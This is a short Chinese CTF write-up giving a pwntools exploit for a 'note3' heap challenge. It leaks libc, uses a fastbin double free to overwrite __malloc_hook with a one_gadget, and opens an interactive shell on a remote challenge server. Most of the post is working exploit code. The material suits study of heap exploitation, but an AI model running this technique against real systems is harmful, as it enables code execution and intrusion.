师傅们我被打脸了服务器没挂就是有点不利索
这道题本地也是能通的用realloc_hook提一下占空间就能够触发one_gadget了我重新写了一个见谅~~
正常的fastbin attack
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./note3')
elf=ELF('./note3')
libc=elf.libc
else:
p=remote('45.76.173.177',6666)
elf=ELF('./note3')
libc=ELF('./libc-2.24.so')
lg=lambda adress,data:log.success('%s: '+hex(data))
def add(size,content):
p.sendlineafter('>>','1')
p.sendlineafter('Size:',str(size))
p.sendlineafter('Content:',content)
def show(idx):
p.sendlineafter('>>','2')
p.sendlineafter('Index:',str(idx))
def edit(idx,content):
p.sendlineafter('>>','3')
p.sendlineafter('Index:',str(idx))
p.sendline(content)
def delete(idx):
p.sendlineafter('>>','4')
p.sendlineafter('Index:',str(idx))
def exp():
show(0)
add(0x90,'aaaa') #0
add(0x68,'bbbb') #1
add(0x68,'cccc') #2
add(0x18,'bbbb') #3
delete(0)
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-libc.sym['__malloc_hook']-0x10
lg('libcbase',libcbase)
o_g=[0x3f306,0x3f35a,0xd694f]
one_gadget=libcbase+o_g[2]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
add(0x90,'cccc') #0
delete(1)
delete(2)
delete(1)
add(0x68,p64(malloc_hook-0x23))
add(0x68,'dddd')
add(0x68,'ffff')
add(0x68,'a'*19+p64(one_gadget))
p.recvuntil('>>')
p.sendline('1')
p.sendlineafter('Size','2')
p.interactive()
if __name__=="__main__":
exp()
flag就在那一个目录下面我开始还以为那个目录就是flag哭了~~
